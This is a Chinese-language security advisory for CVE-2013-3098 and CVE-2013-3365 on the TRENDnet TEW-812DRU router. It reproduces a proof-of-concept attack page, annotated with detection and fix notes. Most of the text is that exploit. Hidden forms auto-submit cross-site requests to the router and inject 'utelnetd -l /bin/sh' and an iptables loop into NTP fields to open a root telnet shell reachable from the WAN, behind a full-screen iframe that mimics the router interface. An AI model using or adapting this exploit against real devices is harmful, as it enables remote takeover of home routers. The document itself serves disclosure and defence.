发布日期:2013-07-28
更新日期:2013-07-31

受影响系统:
trendnet TEW-812DRU
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61492
CVE(CAN) ID: CVE-2013-3365

Trendnet TEW-812DRU是双宽带无线路由器。TRENDnet TEW-812DRU存在命令注入漏洞(CVE-2013-3365),允许攻击者在受影响设备上下文中执行任意命令;下文的测试页面还结合了跨站请求伪造漏洞(CVE-2013-3098)来提交请求。

<*来源:Jacob Holcomb
*>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit
EDB-ID: 27177 CVE: 2013-3098 OSVDB-ID: N/A
Author: Jacob Holcomb Published: 2013-07-28 Verified: Not Verified
<html>
<head>
<title> TRENDnet TEW-812DRU CSRF - Command Injection > Shell Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Command Injection(s) Discovered by: Jacob Holcomb & Kedy Liu - Security Analysts @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# CVE: CSRF - CVE-2013-3098 & Multiple Command Injection - CVE-2013-3365
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<img src="http://192.168.10.1/Images/logo.gif"><!--TRENDnet Logo for attack launch page -->
<h1>Please wait... </h1>
<script type="text/javascript">
//Request to enable port forwarding to the router's internal IP on port 23
//This exploit works without this request, but the exploit was more stable with it, so it's included in this PoC.
//
// RF1 writes a hidden form named "portfwd" into the page. Submitting it sends a
// cross-site POST to the router's /uapply.cgi that describes a single-port
// forward (page=/advanced/single_port.asp) of TCP 23 to 192.168.10.1:23.
// The form carries only configuration fields and no per-session token; that the
// device accepts such a request is the CSRF issue the page tracks as CVE-2013-3098.
// NOTE(review): the inner double quotes of the string literals are unescaped in
// this capture, so the listing is kept verbatim as a record, not as runnable code.
// Defender view: an unexpected forwarding entry for TCP 23 that points at the
// router's own LAN address, or a POST to /uapply.cgi whose Origin/Referer is not
// the router itself, is worth alerting on. The firmware-side fix is an anti-CSRF
// token plus an Origin/Referer check on every state-changing CGI.
function RF1(){
document.write("<form name="portfwd" target ="_blank" action="http://192.168.10.1/uapply.cgi" method="post">"+
"<input type="hidden" name="page" value="/advanced/single_port.asp">"+
"<input type="hidden" name="forward_port_enable" value="0">"+
"<input type="hidden" name="forward_port" value="24">"+
"<input type="hidden" name="forward_port_proto0" value="tcp">"+
"<input type="hidden" name="forward_port_from_start0" value="23">"+
"<input type="hidden" name="forward_port_from_end0" value="23">"+
"<input type="hidden" name="forward_port_to_ip0" value="192.168.10.1">"+
"<input type="hidden" name="forward_port_to_start0" value="23">"+
"<input type="hidden" name="forward_port_to_end0" value="23">"+
"<input type="hidden" name="schedule0" value="0">"+
"<input type="hidden" name="forward_port_enable0" value="on">"+
"<input tpye="hidden" name="action" value="Apply">"+
"</form>");
}//Request to enable telnet
// RF2 writes a hidden form named "enable23" that posts the time/NTP settings
// page (page=/adm/time.asp) to the router's /setNTP.cgi.
// Every field holds an ordinary-looking setting except NtpDstOffset, which
// carries a backtick-wrapped command (`utelnetd -l /bin/sh`) where RF3 below
// sends the plain number 3600. The page tracks this as command injection,
// CVE-2013-3365. Presumably the CGI interpolates the field into a shell command
// line without validation (inferred from the backticks, not shown here).
// Defender view: NtpDstOffset should be parsed as a bounded integer and never
// reach a shell. On the wire, backticks or other shell metacharacters in any
// NtpDst* parameter of a POST to /setNTP.cgi are a high-signal indicator; on the
// device, look for an unexpected utelnetd process or a listener on TCP 23.
function RF2(){
document.write("<form name="enable23" target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">"+
"<input type="hidden" name="page" value="/adm/time.asp">"+
"<input type="hidden" name="DSTenable" value="on">"+
"<input type="hidden" name="NtpDstEnable" value="1">"+
"<input type="hidden" name="NtpDstOffset" value="`utelnetd -l /bin/sh`">"+
"<input type="hidden" name="NtpDstStart" value="030102">"+
"<input type="hidden" name="tz_daylight_start_month_select" value="03">"+
"<input type="hidden" name="tz_daylight_start_day_select" value="01">"+
"<input type="hidden" name="tz_daylight_start_time_select" value="02">"+
"<input type="hidden" name="NtpDstEnd" value="100102">"+
"<input type="hidden" name="tz_daylight_end_month_select" value="10">"+
"<input type="hidden" name="tz_daylight_end_day_select" value="01">"+
"<input type="hidden" name="tz_daylight_end_time_select" value="02">"+
"<input type="hidden" name="ntp_server" value="1">"+
"<input type="hidden" name="NTPServerIP" value="pool.ntp.org">"+
"<input type="hidden" name="time_zone" value="UCT_-11">"+
"<input type="hidden" name="timer_interval" value="300">"+
"<input type="hidden" name="manual_year_select" value="2012">"+
"<input type="hidden" name="manual_month_select" value="01">"+
"<input type="hidden" name="manual_day_select" value="01">"+
"<input type="hidden" name="manual_hour_select" value="00">"+
"<input type="hidden" name="manual_min_select" value="19">"+
"<input type="hidden" name="manual_sec_select" value="57">"+
"<input type="hidden" name="timeTag" value="manual">"+
"</form>");
}//Request to change iptables to allow port 23 from the WAN.
// RF3 writes a hidden form named "ipTableRule" that posts the same time/NTP
// settings to /setNTP.cgi as RF2. Here NtpDstOffset is a plain number (3600) and
// the injected value sits in NtpDstEnd: a backtick-wrapped shell loop that
// repeatedly inserts an ACCEPT rule for TCP destination port 23 at the top of
// the iptables INPUT chain.
// Two different fields of the same CGI take the injected value (NtpDstOffset in
// RF2, NtpDstEnd here), which matches the "Multiple Command Injection" wording in
// the page header. A fix therefore has to validate every parameter of the
// handler, not one field.
// Defender view: on a suspect device, list the INPUT chain and look for repeated
// ACCEPT rules for tcp dport 23 at position 1. From outside, confirm that TCP 23
// is not reachable on the WAN address.
function RF3(){
document.write(
"<form name="ipTableRule" target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">"+
"<input type="hidden" name="page" value="/adm/time.asp">"+
"<input type="hidden" name="DSTenable" value="on">"+
"<input type="hidden" name="NtpDstEnable" value="1">"+
"<input type="hidden" name="NtpDstOffset" value="3600">"+
"<input type="hidden" name="NtpDstStart" value="030102">"+
"<input type="hidden" name="tz_daylight_start_month_select" value="03">"+
"<input type="hidden" name="tz_daylight_start_day_select" value="01">"+
"<input type="hidden" name="tz_daylight_start_time_select" value="02">"+
"<input type="hidden" name="NtpDstEnd" value="`count=0;while [ $count -le 25 ]; do iptables -I INPUT 1 -p tcp --dport 23 -j ACCEPT;(( count++ ));done;`">"+
"<input type="hidden" name="tz_daylight_end_month_select" value="10">"+
"<input type="hidden" name="tz_daylight_end_day_select" value="01">"+
"<input type="hidden" name="tz_daylight_end_time_select" value="02">"+
"<input type="hidden" name="ntp_server" value="1">"+
"<input type="hidden" name="NTPServerIP" value="pool.ntp.org">"+
"<input type="hidden" name="time_zone" value="UCT_-11">"+
"<input type="hidden" name="timer_interval" value="300">"+
"<input type="hidden" name="manual_year_select" value="2012">"+
"<input type="hidden" name="manual_month_select" value="01">"+
"<input type="hidden" name="manual_day_select" value="01">"+
"<input type="hidden" name="manual_hour_select" value="00">"+
"<input type="hidden" name="manual_min_select" value="19">"+
"<input type="hidden" name="manual_sec_select" value="57">"+
"<input type="hidden" name="timeTag" value="manual">"+
"</form>");
}function createPage(){
// createPage emits the three hidden forms, then writes a borderless,
// fixed-position iframe of the router's root page sized to the whole viewport.
// NOTE(review): presumably this makes the page look like the router UI while the
// forms are submitted; the listing does not state the intent.
RF1();
RF2();
RF3();
document.write("<iframe src="http://192.168.10.1/" target="_blank" width="100%" height="100%" frameborder="0" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0;"></iframe>");
}function _portfwd(){
// Submits the "portfwd" form written by RF1 (the form targets _blank).
document.portfwd.submit();
}function _enable23(){
// Submits the "enable23" form written by RF2 (the form targets _blank).
document.enable23.submit();
}function _ipTableRule(){
// Submits the "ipTableRule" form written by RF3 (the form targets _blank).
document.ipTableRule.submit();i
}//Called Functions
// Page start-up: write the forms and the iframe, then schedule the three form
// submissions with setTimeout at 1000 ms, 2000 ms and 4000 ms.
// The loop runs i = 0, 1, 2 and only selects which timer to register, so the
// final else branch is never taken.
// Defender view: the result is three POSTs to the router's CGI endpoints within
// a few seconds, all initiated by a page that is not served by the router. That
// burst is a useful correlation when reviewing proxy or browser logs.
createPage()
for(var i = 0; i < 3; i++){
if(i == 0){
window.setTimeout(_portfwd, 1000);
}
else if(i == 1){
window.setTimeout(_enable23, 2000);
}
else if(i == 2){
window.setTimeout(_ipTableRule, 4000);
}
else{
continue;
}
}
</script>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:trendnet
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.trendnet.com/products/proddetail.asp?prod=100_TEW-812DRU&cat=41

在补丁发布之前,建议在管理路由器期间不要访问不可信网页,管理结束后及时退出登录并关闭浏览器,同时检查设备上是否存在未经授权的端口转发规则或已开启的 telnet 服务(TCP 23)。